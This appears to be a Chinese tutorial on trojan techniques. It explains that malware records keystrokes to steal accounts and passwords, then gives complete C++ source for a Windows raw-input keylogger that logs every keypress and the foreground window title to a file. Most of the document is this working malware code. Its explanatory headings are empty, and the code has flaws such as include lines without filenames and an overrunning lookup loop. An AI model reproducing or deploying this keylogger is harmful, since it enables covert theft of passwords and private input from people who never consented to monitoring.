病毒木马的入侵并潜伏在用户计算机上总是有着某种目的,例如获取用户隐私的办公文件或是账号密码,或是控制肉鸡,或是进行加密磁盘文件然后进行勒索。
顾名思义,即程序在后台记录下用户在计算机上使用的所有按键信息,信息包括哪个时刻在哪个窗口按下哪个按键。
可见,这个功能对于病毒木马来说意义非凡,病毒木马控制者可以根据按键记录分辨出哪些类似于账号,密码等关键数据,从而进行利用,盗取信息。
实现该功能一般有以下三种方式:
下面我们使用第三种方法进行操作,该方法更加底层,也更为有效。
注册提供原始输入的设备
函数声明:
BOOL WINAPI RegisterRawInputDevices(
_In_reads_(uiNumDevices) PCRAWINPUTDEVICE pRawInputDevices,
_In_ UINT uiNumDevices,
_In_ UINT cbSize);
参数说明:
返回值:
结构体定义:
typedef struct tagRAWINPUTDEVICE {
USHORT usUsagePage; // Toplevel collection UsagePage
USHORT usUsage; // Toplevel collection Usage
DWORD dwFlags;
HWND hwndTarget; // Target hwnd. NULL = follows keyboard focus
} RAWINPUTDEVICE, *PRAWINPUTDEVICE, *LPRAWINPUTDEVICE;
成员说明:
函数声明:
UINT WINAPI GetRawInputData(
_In_ HRAWINPUT hRawInput,
_In_ UINT uiCommand,
_Out_writes_bytes_to_opt_(*pcbSize, return) LPVOID pData,
_Inout_ PUINT pcbSize,
_In_ UINT cbSizeHeader);
参数说明:
返回值:
// WindowsProject1.cpp : 定义应用程序的入口点。
//
#include "framework.h"
#include "WindowsProject1.h"
#include
#include
#include
#include
#include
#include
#include
#define AddVKey(VK, VKName) { (VK), (VKName) }
BOOL Init_device(HWND hWnd)
{
RAWINPUTDEVICE rawinputDevice = { 0 };
rawinputDevice.usUsagePage = 0x01;
rawinputDevice.usUsage = 0x06;
rawinputDevice.dwFlags = RIDEV_INPUTSINK;
rawinputDevice.hwndTarget = hWnd;
BOOL bRet = RegisterRawInputDevices(&rawinputDevice, 1, sizeof(rawinputDevice));
if (bRet == FALSE)
{
//printf("Register error!\n");
return FALSE;
}
return TRUE;
}
struct VKeyInfo {
USHORT VKey;
LPCWSTR VKname;
};
static VKeyInfo vkis[] = {
AddVKey(VK_LBUTTON, L"Left mouse button"),
AddVKey(VK_RBUTTON, L"Right mouse button"),
AddVKey(VK_CANCEL, L"Control-break processing"),
AddVKey(0x04, L"Middle mouse button (three-button mouse)"),
AddVKey(0x05, L"Windows 2000/XP: X1 mouse button"),
AddVKey(0x06, L"Windows 2000/XP: X2 mouse button"),
AddVKey(0x07, L"Undefined"),
AddVKey(VK_BACK, L"BACKSPACE key"),
AddVKey(VK_TAB, L"TAB key"),
AddVKey(0x0A, L"Reserved"),
AddVKey(0x0B, L"Reserved"),
AddVKey(VK_CLEAR, L"CLEAR key"),
AddVKey(VK_RETURN, L"ENTER key"),
AddVKey(0x0E, L"Undefined"),
AddVKey(0x0F, L"Undefined"),
AddVKey(VK_SHIFT, L"SHIFT key"),
AddVKey(VK_CONTROL, L"CTRL key"),
AddVKey(VK_MENU, L"ALT key"),
AddVKey(VK_PAUSE, L"PAUSE key"),
AddVKey(VK_CAPITAL, L"CAPS LOCK key"),
AddVKey(VK_KANA, L"Input Method Editor (IME) Kana mode"),
AddVKey(VK_HANGUL, L"IME Hangul mode"),
AddVKey(0x16, L"Undefined"),
AddVKey(VK_JUNJA, L"IME Junja mode"),
AddVKey(VK_FINAL, L"IME final mode"),
AddVKey(VK_HANJA, L"IME Hanja mode"),
AddVKey(VK_KANJI, L"IME Kanji mode"),
AddVKey(0x1A, L"Undefined"),
AddVKey(VK_ESCAPE, L"ESC key"),
AddVKey(VK_CONVERT, L"IME convert"),
AddVKey(VK_NONCONVERT, L"IME nonconvert"),
AddVKey(VK_ACCEPT, L"IME accept"),
AddVKey(VK_MODECHANGE, L"IME mode change request"),
AddVKey(VK_SPACE, L"SPACEBAR"),
AddVKey(VK_PRIOR, L"PAGE UP key"),
AddVKey(VK_NEXT, L"PAGE DOWN key"),
AddVKey(VK_END, L"END key"),
AddVKey(VK_HOME, L"HOME key"),
AddVKey(VK_LEFT, L"LEFT ARROW key"),
AddVKey(VK_UP, L"UP ARROW key"),
AddVKey(VK_RIGHT, L"RIGHT ARROW key"),
AddVKey(VK_DOWN, L"DOWN ARROW key"),
AddVKey(VK_SELECT, L"SELECT key"),
AddVKey(VK_PRINT, L"PRINT key"),
AddVKey(VK_EXECUTE, L"EXECUTE key"),
AddVKey(VK_SNAPSHOT, L"PRINT SCREEN key"),
AddVKey(VK_INSERT, L"INSERT key"),
AddVKey(VK_DELETE, L"DEL key"),
AddVKey(VK_HELP, L"HELP key"),
AddVKey(0x30, L"0"),
AddVKey(0x31, L"1"),
AddVKey(0x32, L"2"),
AddVKey(0x33, L"3"),
AddVKey(0x34, L"4"),
AddVKey(0x35, L"5"),
AddVKey(0x36, L"6"),
AddVKey(0x37, L"7"),
AddVKey(0x38, L"8"),
AddVKey(0x39, L"9"),
AddVKey(0x3A, L"Undefined"),
AddVKey(0x3B, L"Undefined"),
AddVKey(0x3C, L"Undefined"),
AddVKey(0x3D, L"Undefined"),
AddVKey(0x3E, L"Undefined"),
AddVKey(0x3F, L"Undefined"),
AddVKey(0x40, L"Undefined"),
AddVKey(0x41, L"A"),
AddVKey(0x42, L"B"),
AddVKey(0x43, L"C"),
AddVKey(0x44, L"D"),
AddVKey(0x45, L"E"),
AddVKey(0x46, L"F"),
AddVKey(0x47, L"G"),
AddVKey(0x48, L"H"),
AddVKey(0x49, L"I"),
AddVKey(0x4A, L"J"),
AddVKey(0x4B, L"K"),
AddVKey(0x4C, L"L"),
AddVKey(0x4D, L"M"),
AddVKey(0x4E, L"N"),
AddVKey(0x4F, L"O"),
AddVKey(0x50, L"P"),
AddVKey(0x51, L"Q"),
AddVKey(0x52, L"R"),
AddVKey(0x53, L"S"),
AddVKey(0x54, L"T"),
AddVKey(0x55, L"U"),
AddVKey(0x56, L"V"),
AddVKey(0x57, L"W"),
AddVKey(0x58, L"X"),
AddVKey(0x59, L"Y"),
AddVKey(0x5A, L"Z"),
AddVKey(VK_LWIN, L"Left Windows key (Microsoft Natural keyboard)"),
AddVKey(VK_RWIN, L"Right Windows key (Natural keyboard)"),
AddVKey(VK_APPS, L"Applications key (Natural keyboard)"),
AddVKey(0x5E, L"Reserved"),
AddVKey(VK_SLEEP, L"Computer Sleep key"),
AddVKey(VK_NUMPAD0, L"Numeric keypad 0 key"),
AddVKey(VK_NUMPAD1, L"Numeric keypad 1 key"),
AddVKey(VK_NUMPAD2, L"Numeric keypad 2 key"),
AddVKey(VK_NUMPAD3, L"Numeric keypad 3 key"),
AddVKey(VK_NUMPAD4, L"Numeric keypad 4 key"),
AddVKey(VK_NUMPAD5, L"Numeric keypad 5 key"),
AddVKey(VK_NUMPAD6, L"Numeric keypad 6 key"),
AddVKey(VK_NUMPAD7, L"Numeric keypad 7 key"),
AddVKey(VK_NUMPAD8, L"Numeric keypad 8 key"),
AddVKey(VK_NUMPAD9, L"Numeric keypad 9 key"),
AddVKey(VK_MULTIPLY, L"Multiply key"),
AddVKey(VK_ADD, L"Add key"),
AddVKey(VK_SEPARATOR, L"Separator key"),
AddVKey(VK_SUBTRACT, L"Subtract key"),
AddVKey(VK_DECIMAL, L"Decimal key"),
AddVKey(VK_DIVIDE, L"Divide key"),
AddVKey(VK_F1, L"F1 key"),
AddVKey(VK_F2, L"F2 key"),
AddVKey(VK_F3, L"F3 key"),
AddVKey(VK_F4, L"F4 key"),
AddVKey(VK_F5, L"F5 key"),
AddVKey(VK_F6, L"F6 key"),
AddVKey(VK_F7, L"F7 key"),
AddVKey(VK_F8, L"F8 key"),
AddVKey(VK_F9, L"F9 key"),
AddVKey(VK_F10, L"F10 key"),
AddVKey(VK_F11, L"F11 key"),
AddVKey(VK_F12, L"F12 key"),
AddVKey(VK_F13, L"F13 key"),
AddVKey(VK_F14, L"F14 key"),
AddVKey(VK_F15, L"F15 key"),
AddVKey(VK_F16, L"F16 key"),
AddVKey(VK_F17, L"F17 key"),
AddVKey(VK_F18, L"F18 key"),
AddVKey(VK_F19, L"F19 key"),
AddVKey(VK_F20, L"F20 key"),
AddVKey(VK_F21, L"F21 key"),
AddVKey(VK_F22, L"F22 key"),
AddVKey(VK_F23, L"F23 key"),
AddVKey(VK_F24, L"F24 key"),
AddVKey(0x88, L"Unassigned"),
AddVKey(0x89, L"Unassigned"),
AddVKey(0x8A, L"Unassigned"),
AddVKey(0x8B, L"Unassigned"),
AddVKey(0x8C, L"Unassigned"),
AddVKey(0x8D, L"Unassigned"),
AddVKey(0x8E, L"Unassigned"),
AddVKey(0x8F, L"Unassigned"),
AddVKey(VK_NUMLOCK, L"NUM LOCK key"),
AddVKey(VK_SCROLL, L"SCROLL LOCK key"),
AddVKey(0x92, L"OEM specific"),
AddVKey(0x93, L"OEM specific"),
AddVKey(0x94, L"OEM specific"),
AddVKey(0x95, L"OEM specific"),
AddVKey(0x96, L"OEM specific"),
AddVKey(0x97, L"Unassigned"),
AddVKey(0x98, L"Unassigned"),
AddVKey(0x99, L"Unassigned"),
AddVKey(0x9A, L"Unassigned"),
AddVKey(0x9B, L"Unassigned"),
AddVKey(0x9C, L"Unassigned"),
AddVKey(0x9D, L"Unassigned"),
AddVKey(0x9E, L"Unassigned"),
AddVKey(0x9F, L"Unassigned"),
AddVKey(VK_LSHIFT, L"Left SHIFT key"),
AddVKey(VK_RSHIFT, L"Right SHIFT key"),
AddVKey(VK_LCONTROL, L"Left CONTROL key"),
AddVKey(VK_RCONTROL, L"Right CONTROL key"),
AddVKey(VK_LMENU, L"Left MENU key"),
AddVKey(VK_RMENU, L"Right MENU key"),
AddVKey(0xA6, L"Windows 2000/XP: Browser Back key"),
AddVKey(0xA7, L"Windows 2000/XP: Browser Forward key"),
AddVKey(0xA8, L"Windows 2000/XP: Browser Refresh key"),
AddVKey(0xA9, L"Windows 2000/XP: Browser Stop key"),
AddVKey(0xAA, L"Windows 2000/XP: Browser Search key"),
AddVKey(0xAB, L"Windows 2000/XP: Browser Favorites key"),
AddVKey(0xAC, L"Windows 2000/XP: Browser Start and Home key"),
AddVKey(0xAD, L"Windows 2000/XP: Volume Mute key"),
AddVKey(0xAE, L"Windows 2000/XP: Volume Down key"),
AddVKey(0xAF, L"Windows 2000/XP: Volume Up key"),
AddVKey(0xB0, L"Windows 2000/XP: Next Track key"),
AddVKey(0xB1, L"Windows 2000/XP: Previous Track key"),
AddVKey(0xB2, L"Windows 2000/XP: Stop Media key"),
AddVKey(0xB3, L"Windows 2000/XP: Play/Pause Media key"),
AddVKey(0xB4, L"Windows 2000/XP: Start Mail key"),
AddVKey(0xB5, L"Windows 2000/XP: Select Media key"),
AddVKey(0xB6, L"Windows 2000/XP: Start Application 1 key"),
AddVKey(0xB7, L"Windows 2000/XP: Start Application 2 key"),
AddVKey(0xB8, L"Reserved"),
AddVKey(0xB9, L"Reserved"),
AddVKey(VK_OEM_1, L"Used for miscellaneous characters; it can vary by keyboard."
L"Windows 2000/XP: For the US standard keyboard, the \';:\' key"),
AddVKey(VK_OEM_PLUS, L"Windows 2000/XP: For any country/region, the \'+\' key"),
AddVKey(VK_OEM_COMMA, L"Windows 2000/XP: For any country/region, the \',\' key"),
AddVKey(VK_OEM_MINUS, L"Windows 2000/XP: For any country/region, the \'-\' key"),
AddVKey(VK_OEM_PERIOD, L"Windows 2000/XP: For any country/region, the \'.\' key"),
AddVKey(VK_OEM_2, L"Used for miscellaneous characters; it can vary by keyboard.L"
L"Windows 2000/XP: For the US standard keyboard, the \'/?\' key"),
AddVKey(VK_OEM_3, L"Used for miscellaneous characters; it can vary by keyboard.L"
L"Windows 2000/XP: For the US standard keyboard, the \'`~\' key"),
AddVKey(0xC1, L"Reserved"),
AddVKey(0xC2, L"Reserved"),
AddVKey(0xC3, L"Reserved"),
AddVKey(0xC4, L"Reserved"),
AddVKey(0xC5, L"Reserved"),
AddVKey(0xC6, L"Reserved"),
AddVKey(0xC7, L"Reserved"),
AddVKey(0xC8, L"Reserved"),
AddVKey(0xC9, L"Reserved"),
AddVKey(0xCA, L"Reserved"),
AddVKey(0xCB, L"Reserved"),
AddVKey(0xCC, L"Reserved"),
AddVKey(0xCD, L"Reserved"),
AddVKey(0xCE, L"Reserved"),
AddVKey(0xCF, L"Reserved"),
AddVKey(0xD0, L"Reserved"),
AddVKey(0xD1, L"Reserved"),
AddVKey(0xD2, L"Reserved"),
AddVKey(0xD3, L"Reserved"),
AddVKey(0xD4, L"Reserved"),
AddVKey(0xD5, L"Reserved"),
AddVKey(0xD6, L"Reserved"),
AddVKey(0xD7, L"Reserved"),
AddVKey(0xD8, L"Unassigned"),
AddVKey(0xD9, L"Unassigned"),
AddVKey(0xDA, L"Unassigned"),
AddVKey(VK_OEM_4, L"Used for miscellaneous characters; it can vary by keyboard."
L"Windows 2000/XP: For the US standard keyboard, the \'[{\' key"),
AddVKey(VK_OEM_5, L"Used for miscellaneous characters; it can vary by keyboard.L"
L"Windows 2000/XP: For the US standard keyboard, the \'\\|\' key"),
AddVKey(VK_OEM_6, L"Used for miscellaneous characters; it can vary by keyboard.L"
L"Windows 2000/XP: For the US standard keyboard, the \']}\' key"),
AddVKey(VK_OEM_7, L"Used for miscellaneous characters; it can vary by keyboard.L"
L"Windows 2000/XP: For the US standard keyboard, the \'single-quote/double-quote\' key"),
AddVKey(VK_OEM_8, L"Used for miscellaneous characters; it can vary by keyboard."),
AddVKey(0xE0, L"Reserved"),
AddVKey(0xE1, L"OEM specific"),
AddVKey(VK_OEM_102, L"Windows 2000/XP: Either the angle bracket key or the backslash key on the RT 102-key keyboard"),
AddVKey(0xE3, L"OEM specific"),
AddVKey(0xE4, L"OEM specific"),
AddVKey(VK_PROCESSKEY, L"Windows 95/98/Me, Windows NT 4.0, Windows 2000/XP: IME PROCESS key"),
AddVKey(0xE6, L"OEM specific"),
AddVKey(0xE7, L"Windows 2000/XP: Used to pass Unicode characters as if they were keystrokes. The VK_PACKET key is the low word of a 32-bit Virtual Key value used for non-keyboard input methods. For more information, see Remark in KEYBDINPUT, SendInput, WM_KEYDOWN, and WM_KEYUP"),
AddVKey(0xE8, L"Unassigned"),
AddVKey(0xE9, L"OEM specific"),
AddVKey(0xEA, L"OEM specific"),
AddVKey(0xEB, L"OEM specific"),
AddVKey(0xEC, L"OEM specific"),
AddVKey(0xED, L"OEM specific"),
AddVKey(0xEF, L"OEM specific"),
AddVKey(0xF0, L"OEM specific"),
AddVKey(0xF1, L"OEM specific"),
AddVKey(0xF2, L"OEM specific"),
AddVKey(0xF3, L"OEM specific"),
AddVKey(0xF4, L"OEM specific"),
AddVKey(0xF5, L"OEM specific"),
AddVKey(VK_ATTN, L"Attn key"),
AddVKey(VK_CRSEL, L"CrSel key"),
AddVKey(VK_EXSEL, L"ExSel key"),
AddVKey(VK_EREOF, L"Erase EOF key"),
AddVKey(VK_PLAY, L"Play key"),
AddVKey(VK_ZOOM, L"Zoom key"),
AddVKey(VK_NONAME, L"Reserved"),
AddVKey(VK_PA1, L"PA1 key"),
AddVKey(VK_OEM_CLEAR, L"Clear key"),
AddVKey(0xFF, L"Unknown Virtual-Key Code")
};
LPCWSTR GetKeyName(USHORT VKey)
{
int i;
for (i = 0; i < sizeof(vkis); i++)
{
if (VKey == vkis[i].VKey)
return vkis[i].VKname;
}
return vkis[--i].VKname;
}
void Save_key(USHORT usVKey)
{
wchar_t szTitle[MAX_PATH] = { 0 };
wchar_t szKey[MAX_PATH] = { 0 };
wchar_t szText[MAX_PATH] = { 0 };
FILE* fp = NULL;
HWND hForegroudWnd = GetForegroundWindow();
GetWindowText(hForegroudWnd, szTitle, 256);
lstrcpy(szKey, GetKeyName(usVKey));
wsprintf(szText, L"[%s] %s\r\n", szTitle, szKey);
fopen_s(&fp, "keylog.txt", "a+");
if (fp == NULL)
{
//printf("open file error!\n");
return;
}
fwrite(szText, (1 + lstrlenW(szText)), 1, fp);
fclose(fp);
}
BOOL GetData(LPARAM lParam)
{
RAWINPUT rawinputdata = { 0 };
UINT uiSize = sizeof(rawinputdata);
GetRawInputData((HRAWINPUT)lParam, RID_INPUT, &rawinputdata, &uiSize, sizeof(RAWINPUTHEADER));
if (rawinputdata.header.dwType == RIM_TYPEKEYBOARD)
{
if (rawinputdata.data.keyboard.Message == WM_KEYDOWN || rawinputdata.data.keyboard.Message == WM_SYSKEYDOWN)
{
Save_key(rawinputdata.data.keyboard.VKey);
}
}
return TRUE;
}
BOOL CALLBACK ProgMainDlg(HWND hWnd, UINT uiMsg, WPARAM wParam, LPARAM lParam)
{
if (WM_INITDIALOG == uiMsg)
{
Init_device(hWnd);
}
else if (WM_CLOSE == uiMsg)
{
EndDialog(hWnd, NULL);
}
else if (WM_INPUT == uiMsg)
{
GetData(lParam);
}
return FALSE;
}
int WINAPI WinMain(
HINSTANCE hInstance,
HINSTANCE hPrevinstance,
LPSTR lpCmdLine,
int nCmdShow)
{
DialogBoxParam(hInstance, (LPCWSTR)101, NULL, (DLGPROC)ProgMainDlg, NULL);
ExitProcess(NULL);
}